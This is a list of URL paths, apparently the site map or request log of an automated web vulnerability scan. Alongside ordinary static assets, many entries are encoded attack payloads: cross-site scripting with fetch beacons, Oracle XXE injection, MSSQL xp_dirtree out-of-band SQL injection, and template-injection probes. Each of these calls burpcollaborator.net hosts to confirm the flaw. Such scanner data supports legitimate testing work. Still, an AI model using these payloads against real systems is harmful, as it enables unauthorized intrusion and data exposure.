/
/'%22%3e%3csvg/onload%3dfetch%60//hj49rtg65oibm3o4xgs6yeu0orumic64wsnkaayz%5c.burpcollaborator.net%60%3e
/2xm4ilps8q/
/6biyji8vxda0esgtp5kvq3mpggmba2yuqiha40sp
/clientaccesspolicy.xml
/crossdomain.xml
/i4nacu17qp3c7495ihd7jff19sfn3dr5jtalxbl0
/images/apache_pb.gif
/images/poweredby.png
/javascript%3a/*%3c/script%3e%3cimg/onerror%3d'-/%22/-/%20onmouseover%3d1/-/[%60*/[]/[(new(Image)).src%3d(/%3b/%2b/76bzej3wse519tbuk6fwl4hqbhhc52tukibay0mpX%3b.burpcollaborator.net/).replace(/.%3b/g%2c[])]//'src%3d%3e
/noindex/css/bootstrap.min.css
/noindex/css/fonts/Bold/OpenSans-Bold.ttf
/noindex/css/fonts/Bold/OpenSans-Bold.woff
/noindex/css/fonts/Light/OpenSans-Light.ttf
/noindex/css/fonts/Light/OpenSans-Light.woff
/noindex/css/open-sans.css
/robots.txt
/robots.txt?'%22%3e%3csvg%2fonload%3dfetch%60%2f%2frpkjx3mgbyolsdue3qyg4o0au10woncf23wqmeb%5c.burpcollaborator.net%60%3e=1
/robots.txt?(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20mlpxf%20SYSTEM%20%22http%3a%2f%2fni9fqzfc4uhhl9nawmrcxkt6nxtshj5mtgg64v.burpcollab'%7c%7c'orator.net%2f%22%3e%25mlpxf%3b]%3e')%2c'%2fl')%20from%20dual)=1
/robots.txt?(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20nlhyj%20SYSTEM%20%22http%3a%2f%2fzadrib7ow69tdlfmoyjopwlif9l49vxyls8iw7.burpcollab'%7c%7c'orator.net%2f%22%3e%25nlhyj%3b]%3e')%2c'%2fl')%20from%20dual)=1
/robots.txt?1%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c8py0xkmxbfo2suuv37yx450rui0do4cv2jw6mub.burpcollab'%2b'orator.net%5cmmp'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1
/robots.txt?1%7d%7ddj75n'%2f%22%3cbulcd=1
/robots.txt?1'%7c%7c(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20nlhyj%20SYSTEM%20%22http%3a%2f%2fw63oe83ls35q9ibjkvfllthfb6h15stwhq4gs5.burpcollab'%7c%7c'orator.net%2f%22%3e%25nlhyj%3b]%3e')%2c'%2fl')%20from%20dual)%7c%7c'=1
/robots.txt?435wbg0tpb2y6q8rh3cti1en8ee920qsigc32rr=1
/robots.txt?7ynjdsvedx=1
/robots.txt?javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d'-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2f053sdc2pr74u8manjzepkxgjaag54wsojcdz3nsX%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f'src%3d%3e=1
/rwr5fgnkp0.txt
/trace.axd
/web
/web/
/web/?%27%22%3e%3csvg%2fonload%3dfetch%60%2f%2fowog40tdivviza1ban5dbl771y7tvjjb9z3mtai%5c.burpcollaborator.net%60%3e=1
/web/?(select%20extractvalue(xmltype(%27%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20nmcxu%20SYSTEM%20%22http%3a%2f%2f2hkupeer39gwkompv1qrwzslmcs7gx40sufk39.burpcollab%27%7c%7c%27orator.net%2f%22%3e%25nmcxu%3b]%3e%27)%2c%27%2fl%27)%20from%20dual)=1
/web/?(select%20extractvalue(xmltype(%27%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20oqssf%20SYSTEM%20%22http%3a%2f%2f86c0ek3xsf529ubvk7fxl5hrbihd53t6h04qsf.burpcollab%27%7c%7c%27orator.net%2f%22%3e%25oqssf%3b]%3e%27)%2c%27%2fl%27)%20from%20dual)=1
/web/?1%27%7c%7c(select%20extractvalue(xmltype(%27%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20oqssf%20SYSTEM%20%22http%3a%2f%2fif1anuc71peci4k5tho7ufq1ksqned2hqbd11q.burpcollab%27%7c%7c%27orator.net%2f%22%3e%25oqssf%3b]%3e%27)%2c%27%2fl%27)%20from%20dual)%7c%7c%27=1
/web/?1205untmsp=1
/web/?3quvyfnscapxtpvq42zs501mvd18p0ds5gz3pre=1
/web/?ehz6pqe33lg8k0m1vdq3wbsxmosjgb43wrqeg25=1
/web/?owubh$%7b509*110%7dw453h=1
/web/?rg0th%7b%7b102*568%7d%7dx6817=1
/web/?tg9x4etitg=1
/web/assets/css/font-awesome.min.css
/web/assets/css/main.css
/web/assets/fonts/fontawesome-webfont.woff2?v=4.6.3
/web/assets/js/jquery.min.js
/web/assets/js/main.js
/web/assets/js/skel.min.js
/web/assets/js/util.js
/web/images/bg.jpg
/web/images/overlay.png
/web/images/pic01.jpg
/web/images/pic02.jpg
/web/images/pic03.jpg
/web?'%22%3e%3csvg%2fonload%3dfetch%60%2f%2fowog40tdivviza1ban5dbl771y7tvjjb9z3mtai%5c.burpcollaborator.net%60%3e=1
/web?(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20nmcxu%20SYSTEM%20%22http%3a%2f%2f2hkupeer39gwkompv1qrwzslmcs7gx40sufk39.burpcollab'%7c%7c'orator.net%2f%22%3e%25nmcxu%3b]%3e')%2c'%2fl')%20from%20dual)=1
/web?(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20oqssf%20SYSTEM%20%22http%3a%2f%2f86c0ek3xsf529ubvk7fxl5hrbihd53t6h04qsf.burpcollab'%7c%7c'orator.net%2f%22%3e%25oqssf%3b]%3e')%2c'%2fl')%20from%20dual)=1
/web?1%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5cxklps9hm64jrnjpkywtmzuvgp7v2js7jx7ruhi6.burpcollab'%2b'orator.net%5ctoy'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1
/web?1'%7c%7c(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20nmcxu%20SYSTEM%20%22http%3a%2f%2fr5xjd32gry4l8daejqegkogaa1gw4msqgk3arz.burpcollab'%7c%7c'orator.net%2f%22%3e%25nmcxu%3b]%3e')%2c'%2fl')%20from%20dual)%7c%7c'=1
/web?1'%7c%7c(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20oqssf%20SYSTEM%20%22http%3a%2f%2fif1anuc71peci4k5tho7ufq1ksqned2hqbd11q.burpcollab'%7c%7c'orator.net%2f%22%3e%25oqssf%3b]%3e')%2c'%2fl')%20from%20dual)%7c%7c'=1
/web?javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d'-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2fz44rcb1oq63t7l9miydojwfi99f43urmiacx2lrX%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f'src%3d%3e=1
/web?kmacuwj98rlep6r70jv91hx3ruxplf971vvil6a=1
/web?oh9gp0ed3vgikambvnqdwls7mystgj4bwzqmga5=1
/web?owubh$%7b509*110%7dw453h=1
/web?rg0th%7b%7b102*568%7d%7dx6817=1
/web?tg9x4etitg=1
/web?zlgp3%23%7b135*733%7da246g=1
/webb9lt0lly84/
0fgsnccp17euimkntzopuxqjkaq5ev2otcjz9ny.burpcollaborator.net:443
@7x5z5juwjew10t2ub66wc48q2h8cw2kupif55tu.burpcollaborator.net/
@gtd81sq5fnsaw2y37f258d4zyq4lscg4lsbf13q.burpcollaborator.net/
@wzzo78wll3yq2i4jdv8letaf46a1ytmlr9hw7kw.burpcollaborator.net/
http://413w9gytnb0y4q6rf3atg1cn6ec90zorsfi28qx.burpcollaborator.net/
http://iqcayun7cppct4v54hz75f11vs1nped6hu7hx5m.burpcollaborator.net/
http://w85og85lu37qbidjmvhlntjfd6j17tvlz9pwfk4.burpcollaborator.net/
rxsj53ugjywl0d2ebq6gco8a218wwnkgb41rrfg.burpcollaborator.net:443
